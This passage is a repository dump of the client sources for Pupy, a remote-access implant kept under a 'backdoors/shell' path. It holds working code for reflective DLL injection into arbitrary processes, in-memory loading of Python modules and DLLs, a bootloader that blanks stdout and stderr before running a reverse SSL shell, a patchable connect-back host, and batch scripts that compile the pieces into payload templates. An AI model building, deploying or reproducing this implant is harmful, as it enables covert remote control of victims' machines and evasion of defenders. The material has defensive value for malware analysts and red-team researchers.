Py_ssize_t; 12 | # elif defined (_WIN32) 13 | typedef int Py_ssize_t; 14 | # endif 15 | #endif 16 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/ReflectiveDllInjection.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | 34 | // we declare some common stuff in here... 35 | 36 | #define DLL_QUERY_HMODULE 6 37 | 38 | #define DEREF( name )*(UINT_PTR *)(name) 39 | #define DEREF_64( name )*(DWORD64 *)(name) 40 | #define DEREF_32( name )*(DWORD *)(name) 41 | #define DEREF_16( name )*(WORD *)(name) 42 | #define DEREF_8( name )*(BYTE *)(name) 43 | 44 | typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID ); 45 | typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); 46 | 47 | #define DLLEXPORT __declspec( dllexport ) 48 | 49 | //===============================================================================================// 50 | #endif 51 | //===============================================================================================// 52 | 53 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/_memimporter.c: -------------------------------------------------------------------------------- 1 | /* 2 | For the _memimporter compiled into py2exe exe-stubs we need "Python-dynload.h". 3 | For the standalone .pyd we need 4 | */ 5 | 6 | #ifdef STANDALONE 7 | # include 8 | # include "Python-version.h" 9 | #else 10 | # include "Python-dynload.h" 11 | # include 12 | #endif 13 | #include 14 | 15 | static char module_doc[] = 16 | "Importer which can load extension modules from memory"; 17 | 18 | //#include "MemoryModule.h" 19 | #include "MyLoadLibrary.h" 20 | #include "actctx.h" 21 | 22 | 23 | static PyObject * 24 | import_module(PyObject *self, PyObject *args) 25 | { 26 | char *data; 27 | int size; 28 | char *initfuncname; 29 | char *modname; 30 | char *pathname; 31 | //HMEMORYMODULE hmem; 32 | HMODULE hmem; 33 | FARPROC do_init; 34 | 35 | ULONG_PTR cookie = 0; 36 | char *oldcontext; 37 | 38 | /* code, initfuncname, fqmodulename, path */ 39 | if (!PyArg_ParseTuple(args, "s#sss:import_module", 40 | &data, &size, 41 | &initfuncname, &modname, &pathname)) 42 | return NULL; 43 | cookie = _My_ActivateActCtx();//try some windows manifest magic... 44 | hmem=MyLoadLibrary(pathname, data, NULL); 45 | _My_DeactivateActCtx(cookie); 46 | if (!hmem) { 47 | PyErr_Format(PyExc_ImportError, 48 | "MemoryLoadLibrary failed loading %s", pathname); 49 | return NULL; 50 | } 51 | do_init = MyGetProcAddress(hmem, initfuncname); 52 | if (!do_init) { 53 | MyFreeLibrary(hmem); 54 | PyErr_Format(PyExc_ImportError, 55 | "Could not find function %s", initfuncname); 56 | return NULL; 57 | } 58 | 59 | oldcontext = _Py_PackageContext; 60 | _Py_PackageContext = modname; 61 | do_init(); 62 | _Py_PackageContext = oldcontext; 63 | if (PyErr_Occurred()) 64 | return NULL; 65 | /* Retrieve from sys.modules */ 66 | return PyImport_ImportModule(modname); 67 | } 68 | 69 | static PyObject * 70 | get_verbose_flag(PyObject *self, PyObject *args) 71 | { 72 | return PyInt_FromLong(Py_VerboseFlag); 73 | } 74 | 75 | static PyMethodDef methods[] = { 76 | { "import_module", import_module, METH_VARARGS, 77 | "import_module(data, size, initfuncname, path) -> module" }, 78 | { "get_verbose_flag", get_verbose_flag, METH_NOARGS, 79 | "Return the Py_Verbose flag" }, 80 | { NULL, NULL }, /* Sentinel */ 81 | }; 82 | 83 | DL_EXPORT(void) 84 | init_memimporter(void) 85 | { 86 | Py_InitModule3("_memimporter", methods, module_doc); 87 | } 88 | 89 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/actctx.c: -------------------------------------------------------------------------------- 1 | #include "actctx.h" 2 | 3 | HANDLE PyWin_DLLhActivationContext=NULL; 4 | PFN_GETCURRENTACTCTX pfnGetCurrentActCtx=NULL; 5 | PFN_ACTIVATEACTCTX pfnActivateActCtx=NULL; 6 | PFN_DEACTIVATEACTCTX pfnDeactivateActCtx=NULL; 7 | PFN_ADDREFACTCTX pfnAddRefActCtx=NULL; 8 | PFN_RELEASEACTCTX pfnReleaseActCtx=NULL; 9 | 10 | ULONG_PTR _My_ActivateActCtx() 11 | { 12 | ULONG_PTR ret = 0; 13 | if (PyWin_DLLhActivationContext && pfnActivateActCtx) 14 | if (!(*pfnActivateActCtx)(PyWin_DLLhActivationContext, &ret)) { 15 | ret = 0; // no promise the failing function didn't change it! 16 | } 17 | return ret; 18 | } 19 | 20 | void _My_DeactivateActCtx(ULONG_PTR cookie) 21 | { 22 | if (cookie && pfnDeactivateActCtx) 23 | if (!(*pfnDeactivateActCtx)(0, cookie)){} 24 | } 25 | 26 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/actctx.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | // Windows "Activation Context" work: 7 | // Our .pyd extension modules are generally built without a manifest (ie, 8 | // those included with Python and those built with a default distutils. 9 | // This requires we perform some "activation context" magic when loading our 10 | // extensions. In summary: 11 | // * As our DLL loads we save the context being used. 12 | // * Before loading our extensions we re-activate our saved context. 13 | // * After extension load is complete we restore the old context. 14 | // As an added complication, this magic only works on XP or later - we simply 15 | // use the existence (or not) of the relevant function pointers from kernel32. 16 | // See bug 4566 (http://python.org/sf/4566) for more details. 17 | #ifdef __cplusplus 18 | extern "C" { 19 | #endif 20 | 21 | typedef BOOL (WINAPI * PFN_GETCURRENTACTCTX)(HANDLE *); 22 | typedef BOOL (WINAPI * PFN_ACTIVATEACTCTX)(HANDLE, ULONG_PTR *); 23 | typedef BOOL (WINAPI * PFN_DEACTIVATEACTCTX)(DWORD, ULONG_PTR); 24 | typedef BOOL (WINAPI * PFN_ADDREFACTCTX)(HANDLE); 25 | typedef BOOL (WINAPI * PFN_RELEASEACTCTX)(HANDLE); 26 | 27 | // locals and function pointers for this activation context magic. 28 | extern HANDLE PyWin_DLLhActivationContext; 29 | extern PFN_GETCURRENTACTCTX pfnGetCurrentActCtx; 30 | extern PFN_ACTIVATEACTCTX pfnActivateActCtx; 31 | extern PFN_DEACTIVATEACTCTX pfnDeactivateActCtx; 32 | extern PFN_ADDREFACTCTX pfnAddRefActCtx; 33 | extern PFN_RELEASEACTCTX pfnReleaseActCtx; 34 | 35 | void _MyLoadActCtxPointers(); 36 | ULONG_PTR _My_ActivateActCtx(); 37 | void _My_DeactivateActCtx(ULONG_PTR cookie); 38 | 39 | #ifdef __cplusplus 40 | } 41 | #endif 42 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/gen_library_compressed_string.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: UTF8 -*- 3 | import StringIO, zipfile, os.path, imp, sys 4 | import marshal 5 | import zlib 6 | 7 | def get_encoded_library_string(arch): 8 | filepath=None 9 | if arch=="x86": 10 | filepath=os.path.join("resources","libraryx86.zip") 11 | elif arch=="x64": 12 | filepath=os.path.join("resources","libraryx64.zip") 13 | else: 14 | raise Exception("unknown arch %s"%arch) 15 | f = StringIO.StringIO() 16 | f.write(open(filepath, "rb").read()) 17 | 18 | zip = zipfile.ZipFile(f) 19 | 20 | modules = dict([(z.filename, zip.open(z.filename,).read()) for z in zip. infolist() if os.path.splitext(z.filename)[1] in [".py",".pyd",".dll",".pyc",".pyo"]]) 21 | 22 | return zlib.compress(marshal.dumps(modules),9) 23 | try: 24 | with open(os.path.join("resources","library_compressed_string_x86.txt"),'wb') as w: 25 | w.write(get_encoded_library_string("x86")) 26 | print "x86 encoded library generated" 27 | except Exception as e: 28 | print str(e) 29 | try: 30 | with open(os.path.join("resources","library_compressed_string_x64.txt"),'wb') as w: 31 | w.write(get_encoded_library_string("x64")) 32 | print "x64 encoded library generated" 33 | except Exception as e: 34 | print str(e) 35 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/gen_python_bootloader.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: UTF8 -*- 3 | import marshal 4 | import struct 5 | import base64 6 | import os.path 7 | 8 | 9 | remove_stdout=""" 10 | import sys 11 | class Blackhole(object): 12 | softspace = 0 13 | def read(self): 14 | pass 15 | def write(self, text): 16 | pass 17 | def flush(self): 18 | pass 19 | sys.stdout = Blackhole() 20 | sys.stderr = Blackhole() 21 | del Blackhole 22 | """ 23 | #remove_stdout="" 24 | def get_load_module_code(code, modulename): 25 | loader=""" 26 | import imp, sys 27 | fullname={} 28 | mod = imp.new_module(fullname) 29 | mod.__file__ = "\\%s" % fullname 30 | exec {} in mod.__dict__ 31 | sys.modules[fullname]=mod 32 | """.format(repr(modulename),repr(code)) 33 | return loader 34 | 35 | 36 | if __name__=="__main__": 37 | code_bytes=[] 38 | code="" 39 | #code_bytes.append(compile("import sys; print repr(sys._GetCompressedLibraryString())"+"\n", "", "exec")) 40 | code_bytes.append(compile(remove_stdout, "", "exec")) 41 | code_bytes.append(compile("import sys;sys.argv=[]", "", "exec")) 42 | with open(os.path.join("..", "..", "pupy", "packages","all", "pupyimporter.py")) as f: 43 | code=f.read() 44 | code_bytes.append(compile(get_load_module_code(code,"pupyimporter")+"\n", "", "exec")) 45 | code_bytes.append(compile("import pupyimporter;pupyimporter.install()\n", "", "exec")) 46 | #code_bytes.append(compile("import platform; print platform.uname()\n", "", "exec")) 47 | with open(os.path.join("..","reverse_ssl.py")) as f: 48 | code=f.read() 49 | code_bytes.append(compile(code+"\n", "", "exec")) 50 | code_bytes=marshal.dumps(code_bytes) 51 | with open(os.path.join("resources","bootloader.pyc"),'wb') as w: 52 | w.write(code_bytes) 53 | 54 | 55 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/gen_resource_header.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: UTF8 -*- 3 | import sys 4 | import binascii 5 | 6 | MAX_CHAR_PER_LINE=50 7 | 8 | if __name__=="__main__": 9 | h_file="" 10 | file_bytes=b"" 11 | with open(sys.argv[1], "rb") as f: 12 | file_bytes=f.read() 13 | h_file += "int %s_size = %s;"%(sys.argv[1].replace(".","_").replace("\\","_").replace("/","_"), len(file_bytes)) 14 | h_file += "\nchar %s_start[] = {\n"%sys.argv[1].replace(".","_").replace("\\","_").replace("/","_") 15 | current_size=0 16 | 17 | for c in file_bytes: 18 | h_file+="'\\x%s',"%binascii.hexlify(c) 19 | current_size+=1 20 | if current_size>MAX_CHAR_PER_LINE: 21 | current_size=0 22 | h_file+="\n" 23 | 24 | h_file += "'\\x00' };\n" 25 | 26 | with open(sys.argv[1].replace(".","_").replace("\\","_").replace("/","_")+".c",'w') as w: 27 | w.write(h_file) 28 | 29 | 30 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/import-tab.c: -------------------------------------------------------------------------------- 1 | { "Py_Initialize", NULL }, 2 | { "PyRun_SimpleString", NULL }, 3 | { "Py_Finalize", NULL }, 4 | { "Py_GetPath", NULL }, 5 | { "Py_SetPythonHome", NULL }, 6 | { "Py_SetProgramName", NULL }, 7 | { "PyMarshal_ReadObjectFromString", NULL }, 8 | { "PyObject_CallFunction", NULL }, 9 | { "PyString_AsStringAndSize", NULL }, 10 | { "PyString_AsString", NULL }, 11 | { "PyArg_ParseTuple", NULL }, 12 | { "PyErr_Format", NULL }, 13 | { "PyImport_ImportModule", NULL }, 14 | { "PyInt_FromLong", NULL }, 15 | { "PyInt_AsLong", NULL }, 16 | { "PyLong_FromVoidPtr", NULL }, 17 | #ifdef _DEBUG 18 | { "Py_InitModule4TraceRefs", NULL }, 19 | #else 20 | # if defined (_WIN64) 21 | { "Py_InitModule4_64", NULL }, 22 | # else 23 | { "Py_InitModule4", NULL }, 24 | # endif 25 | #endif 26 | { "PyTuple_New", NULL }, 27 | { "PyTuple_SetItem", NULL }, 28 | { "Py_IsInitialized", NULL }, 29 | { "PyObject_SetAttrString", NULL }, 30 | { "PyCFunction_NewEx", NULL }, 31 | { "PyObject_GetAttrString", NULL }, 32 | { "Py_BuildValue", NULL }, 33 | { "PyObject_Call", NULL }, 34 | { "PySys_WriteStderr", NULL }, 35 | { "PyErr_Occurred", NULL }, 36 | { "PyErr_Clear", NULL }, 37 | { "PyObject_IsInstance", NULL }, 38 | { "PyInt_Type", NULL }, 39 | { "_Py_NoneStruct", NULL }, 40 | { "PyExc_ImportError", NULL }, 41 | { "PyExc_Exception", NULL }, 42 | { "_Py_PackageContext", NULL }, 43 | { "PyGILState_Ensure", NULL }, 44 | { "PyGILState_Release", NULL }, 45 | { "PySys_SetObject", NULL }, 46 | { "PySys_GetObject", NULL }, 47 | { "PyString_FromString", NULL }, 48 | { "Py_FdIsInteractive", NULL }, 49 | { "PyRun_InteractiveLoop", NULL }, 50 | { "PySys_SetArgv", NULL }, 51 | { "PyImport_AddModule", NULL }, 52 | { "PyModule_GetDict", NULL }, 53 | { "PySequence_Length", NULL }, 54 | { "PySequence_GetItem", NULL }, 55 | { "PyEval_EvalCode", NULL }, 56 | { "PyErr_Print", NULL }, 57 | { "PyBool_FromLong", NULL }, 58 | { "Py_VerboseFlag", NULL }, 59 | { "Py_NoSiteFlag", NULL }, 60 | { "Py_OptimizeFlag", NULL }, 61 | { "Py_IgnoreEnvironmentFlag", NULL }, 62 | { "PyObject_Str", NULL }, 63 | { "PyList_New", NULL }, 64 | { "PyList_SetItem", NULL }, 65 | { "PyList_Append", NULL }, 66 | { "PyThreadState_GetDict", NULL }, 67 | { "PyObject_IsTrue", NULL }, 68 | { "PyErr_SetString", NULL }, 69 | { "PyEval_InitThreads", NULL }, 70 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/list.h: -------------------------------------------------------------------------------- 1 | /*! 2 | * @file list.h 3 | * @brief Declarations for functions that operate on lists. 4 | */ 5 | #ifndef _METERPRETER_LIB_LIST_H 6 | #define _METERPRETER_LIB_LIST_H 7 | 8 | /*! @brief Container struct for data the lives in a list. */ 9 | typedef struct _NODE 10 | { 11 | struct _NODE * next; ///< Pointer to the next node in the list. 12 | struct _NODE * prev; ///< Pointer to the previous node in the list. 13 | LPVOID data; ///< Reference to the data in the list node. 14 | } NODE, *PNODE; 15 | 16 | /*! @brief Container structure for a list instance. */ 17 | typedef struct _LIST 18 | { 19 | NODE * start; ///< Pointer to the first node in the list. 20 | NODE * end; ///< Pointer to the last node in the list. 21 | DWORD count; ///< Count of elements in the list. 22 | LOCK * lock; ///< Reference to the list's synchronisation lock. 23 | } LIST, *PLIST; 24 | 25 | typedef BOOL (*PLISTENUMCALLBACK)(LPVOID pState, LPVOID pData); 26 | 27 | LIST * list_create(VOID); 28 | VOID list_destroy(PLIST pList); 29 | DWORD list_count(PLIST pList); 30 | LPVOID list_get(PLIST pList, DWORD index); 31 | BOOL list_add(PLIST pList, LPVOID data); 32 | BOOL list_remove(PLIST pList, LPVOID data); 33 | BOOL list_delete(PLIST pList, DWORD index); 34 | BOOL list_push(PLIST pList, LPVOID data); 35 | LPVOID list_pop(PLIST pList); 36 | LPVOID list_shift(PLIST pList); 37 | BOOL list_enumerate(PLIST pList, PLISTENUMCALLBACK pCallback, LPVOID pState); 38 | 39 | #endif 40 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/main_exe.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "pupy_load.h" 6 | 7 | #pragma comment(linker, "/SUBSYSTEM:windows /ENTRY:mainCRTStartup") 8 | 9 | 10 | /* value ":" will be searched/replaced by the framework to change pupy connect back IP without recompiling the DLL */ 11 | char connect_back_host[100]=":"; //big array to have space for big domain names. 12 | int main(int argc, char *argv[]){ 13 | if (argc==2){ 14 | memcpy(connect_back_host, argv[1], strlen(argv[1])+1); 15 | } 16 | if(strcmp(connect_back_host,":")==0){ 17 | printf("usage: %s :",argv[0]); 18 | return 1; 19 | } 20 | return mainThread(NULL); 21 | } 22 | 23 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/main_reflective.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Author : Nicolas VERDIER 3 | * 4 | */ 5 | //#pragma comment(lib, "user32") 6 | 7 | #include 8 | #include "pupy_load.h" 9 | #include "ReflectiveDllInjection.h" 10 | 11 | /* value ":" will be searched/replaced by the framework to change pupy connect back IP without recompiling the DLL */ 12 | char connect_back_host[100]=":"; //big array to have space for big domain names. 13 | 14 | extern HINSTANCE hAppInstance; 15 | //===============================================================================================// 16 | BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) 17 | { 18 | HANDLE hThread; 19 | DWORD threadId; 20 | BOOL bReturnValue = TRUE; 21 | switch( dwReason ) 22 | { 23 | case DLL_QUERY_HMODULE: 24 | if( lpReserved != NULL ) 25 | *(HMODULE *)lpReserved = hAppInstance; 26 | break; 27 | case DLL_PROCESS_ATTACH: 28 | //MessageBoxA(0, "injection ok", "injection ok", MB_OK | MB_ICONINFORMATION); 29 | hAppInstance = hinstDLL; 30 | mainThread(NULL); 31 | hThread = CreateThread(NULL, 32 | 0, // dwStackSize 33 | mainThread, // lpStartAddress 34 | NULL, // lpParameter 35 | 0, // dwCreationFlags (0==run right after creation) 36 | &threadId 37 | ); 38 | 39 | break; 40 | case DLL_PROCESS_DETACH: 41 | case DLL_THREAD_ATTACH: 42 | case DLL_THREAD_DETACH: 43 | break; 44 | } 45 | return bReturnValue; 46 | } 47 | 48 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/makex64.bat: -------------------------------------------------------------------------------- 1 | SET python_path="C:\\Python27\\python.exe" 2 | SET cl_path="C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" 3 | 4 | del *.obj 5 | del *.exp 6 | del pupyx64.exe 7 | del pupyx64.dll 8 | 9 | ::First: generate resources : 10 | %python_path% gen_library_compressed_string.py 11 | copy resources\library_compressed_string_x64.txt resources\library_compressed_string.txt 12 | %python_path% gen_resource_header.py resources\library_compressed_string.txt 13 | copy resources\python27_x64.dll resources\python27.dll 14 | %python_path% gen_resource_header.py resources\python27.dll 15 | %python_path% gen_python_bootloader.py 16 | copy resources\msvcr90_x64.dll resources\msvcr90.dll 17 | %python_path% gen_resource_header.py resources\msvcr90.dll 18 | %python_path% gen_resource_header.py resources\bootloader.pyc 19 | ::compile them to obj files : 20 | %cl_path% /c resources_library_compressed_string_txt.c 21 | %cl_path% /c resources_bootloader_pyc.c 22 | %cl_path% /c resources_python27_dll.c 23 | %cl_path% /c resources_msvcr90_dll.c 24 | 25 | ::then compile 26 | 27 | %cl_path% /c Python-dynload.c /IC:\Python27\include /D_WIN64 28 | %cl_path% /c MemoryModule.c /D_WIN64 29 | %cl_path% /c MyLoadLibrary.c /IC:\Python27\include /D_WIN64 30 | %cl_path% /c _memimporter.c /IC:\Python27\include /D_WIN64 31 | %cl_path% /c pupy_load.c /IC:\Python27\include /DWIN_X64 /D_WIN64 32 | %cl_path% /O2 /Ob1 /c ReflectiveLoader.c /DWIN_X64 -DREFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN /DREFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR /D_WIN64 33 | %cl_path% /c actctx.c /D_WIN64 34 | %cl_path% /c pupy.c /IC:\Python27\include /D_WIN64 35 | %cl_path% /c LoadLibraryR.c /D_WIN64 36 | %cl_path% /c list.c /D_WIN64 37 | %cl_path% /c thread.c /D_WIN64 38 | %cl_path% /c remote_thread.c /D_WIN64 39 | %cl_path% /c base_inject.c /IC:\Python27\include /D_WIN64 40 | %cl_path% main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx64.exe /D_WIN64 41 | %cl_path% main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj ReflectiveLoader.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx64.dll /LD /D_WIN64 42 | 43 | copy pupyx64.dll ..\..\pupy\payload_templates\ 44 | copy pupyx64.exe ..\..\pupy\payload_templates\ 45 | 46 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/makex86.bat: -------------------------------------------------------------------------------- 1 | SET python_path="C:\\Python27\\python.exe" 2 | SET cl_path="C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" 3 | 4 | del *.obj 5 | del *.exp 6 | del pupyx86.exe 7 | del pupyx86.dll 8 | 9 | IF [%1]==[quick] GOTO compilation 10 | ::First: generate resources : 11 | copy resources\python27_x86.dll resources\python27.dll 12 | %python_path% gen_library_compressed_string.py 13 | copy resources\library_compressed_string_x86.txt resources\library_compressed_string.txt 14 | %python_path% gen_resource_header.py resources\library_compressed_string.txt 15 | %python_path% gen_resource_header.py resources\python27.dll 16 | copy resources\msvcr90_x86.dll resources\msvcr90.dll 17 | %python_path% gen_resource_header.py resources\msvcr90.dll 18 | %python_path% gen_python_bootloader.py 19 | %python_path% gen_resource_header.py resources\bootloader.pyc 20 | 21 | :compilation 22 | 23 | %cl_path% /c resources_library_compressed_string_txt.c 24 | %cl_path% /c resources_bootloader_pyc.c 25 | %cl_path% /c resources_python27_dll.c 26 | %cl_path% /c resources_msvcr90_dll.c 27 | 28 | %cl_path% /c Python-dynload.c /IC:\Python27\include 29 | %cl_path% /c MemoryModule.c 30 | %cl_path% /c _memimporter.c /IC:\Python27\include 31 | %cl_path% /c pupy_load.c /DWIN_X86 /IC:\Python27\include 32 | %cl_path% /c MyLoadLibrary.c /IC:\Python27\include 33 | %cl_path% /O2 /Ob1 /c ReflectiveLoader.c /DWIN_X86 -DREFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN /DREFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR 34 | %cl_path% /c actctx.c 35 | %cl_path% /c pupy.c /IC:\Python27\include 36 | %cl_path% /c LoadLibraryR.c 37 | %cl_path% /c list.c 38 | %cl_path% /c thread.c 39 | %cl_path% /c remote_thread.c 40 | %cl_path% /c base_inject.c /IC:\Python27\include 41 | %cl_path% main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx86.exe 42 | 43 | %cl_path% main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj ReflectiveLoader.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx86.dll /LD 44 | copy pupyx86.dll ..\..\pupy\payload_templates\ 45 | copy pupyx86.exe ..\..\pupy\payload_templates\ 46 | 47 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/pupy.c: -------------------------------------------------------------------------------- 1 | /* 2 | For the pupy_builtins compiled into pupy exe and reflective DLL stubs we need "Python-dynload.h". 3 | For the standalone .pyd we need 4 | */ 5 | 6 | #include "Python-dynload.h" 7 | #include 8 | #include 9 | #include "base_inject.h" 10 | static char module_doc[] = "Builtins utilities for pupy"; 11 | 12 | extern const char resources_library_compressed_string_txt_start[]; 13 | extern const int resources_library_compressed_string_txt_size; 14 | #ifndef STANDALONE 15 | extern char connect_back_host[100]; 16 | #else 17 | char connect_back_host[100] = "0.0.0.0:443"; 18 | #endif 19 | extern const DWORD dwPupyArch; 20 | static PyObject *Py_get_compressed_library_string(PyObject *self, PyObject *args) 21 | { 22 | return Py_BuildValue("s#", resources_library_compressed_string_txt_start, resources_library_compressed_string_txt_size); 23 | } 24 | 25 | static PyObject * 26 | Py_get_connect_back_host(PyObject *self, PyObject *args) 27 | { 28 | return Py_BuildValue("s", connect_back_host); 29 | } 30 | static PyObject *Py_get_arch(PyObject *self, PyObject *args) 31 | { 32 | if(dwPupyArch==PROCESS_ARCH_X86){ 33 | return Py_BuildValue("s", "x86"); 34 | } 35 | else if(dwPupyArch==PROCESS_ARCH_X64){ 36 | return Py_BuildValue("s", "x64"); 37 | } 38 | return Py_BuildValue("s", "unknown"); 39 | } 40 | 41 | static PyObject * 42 | Py_reflective_inject_dll(PyObject *self, PyObject *args) 43 | { 44 | DWORD dwPid; 45 | const char *lpDllBuffer; 46 | DWORD dwDllLenght; 47 | const char *cpCommandLine; 48 | PyObject* py_is64bit; 49 | int is64bits; 50 | if (!PyArg_ParseTuple(args, "Is#O", &dwPid, &lpDllBuffer, &dwDllLenght, &py_is64bit)) 51 | return NULL; 52 | is64bits = PyObject_IsTrue(py_is64bit); 53 | if(is64bits){ 54 | is64bits=PROCESS_ARCH_X64; 55 | }else{ 56 | is64bits=PROCESS_ARCH_X86; 57 | } 58 | if(inject_dll( dwPid, lpDllBuffer, dwDllLenght, NULL, is64bits) != ERROR_SUCCESS) 59 | return NULL; 60 | return PyBool_FromLong(1); 61 | } 62 | 63 | static PyMethodDef methods[] = { 64 | { "get_connect_back_host", Py_get_connect_back_host, METH_NOARGS, "get_connect_back_host() -> (ip, port)" }, 65 | { "get_arch", Py_get_arch, METH_NOARGS, "get current pupy architecture (x86 or x64)" }, 66 | { "_get_compressed_library_string", Py_get_compressed_library_string, METH_VARARGS }, 67 | { "reflective_inject_dll", Py_reflective_inject_dll, METH_VARARGS|METH_KEYWORDS, "reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)\nreflectively inject a dll into a process. raise an Exception on failure" }, 68 | { NULL, NULL }, /* Sentinel */ 69 | }; 70 | 71 | DL_EXPORT(void) 72 | initpupy(void) 73 | { 74 | Py_InitModule3("pupy", methods, module_doc); 75 | } 76 | 77 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/pupy_load.h: -------------------------------------------------------------------------------- 1 | #ifndef PYTHONINTERPRETER 2 | #define PYTHONINTERPRETER 3 | 4 | DWORD WINAPI mainThread(LPVOID lpArg); 5 | #endif 6 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/remote_thread.h: -------------------------------------------------------------------------------- 1 | #ifndef _METERPRETER_REMOTE_THREAD_H 2 | #define _METERPRETER_REMOTE_THREAD_H 3 | 4 | HANDLE create_remote_thread(HANDLE hProcess, SIZE_T sStackSize, LPVOID pvStartAddress, LPVOID pvStartParam, DWORD dwCreateFlags, LPDWORD pdwThreadId); 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/resource_python_manifest.c: -------------------------------------------------------------------------------- 1 | 2 | #ifdef _WIN64 3 | const char resource_python_manifest[]="\n" 4 | "\n" 5 | "\n" 6 | "\n" 7 | "\n" 8 | "\n" 9 | "\n" 10 | "\n" 11 | "\n" 12 | "\n" 13 | "\n" 14 | "\n" 15 | "\n" 16 | "\n" 17 | "\n"; 18 | #else 19 | const char resource_python_manifest[]="\n" 20 | "\n" 21 | "\n" 22 | "\n" 23 | "\n" 24 | "\n" 25 | "\n" 26 | "\n" 27 | "\n" 28 | "\n" 29 | "\n" 30 | "\n" 31 | "\n" 32 | "\n" 33 | "\n"; 34 | #endif 35 | 36 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/resources/iter_files.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env 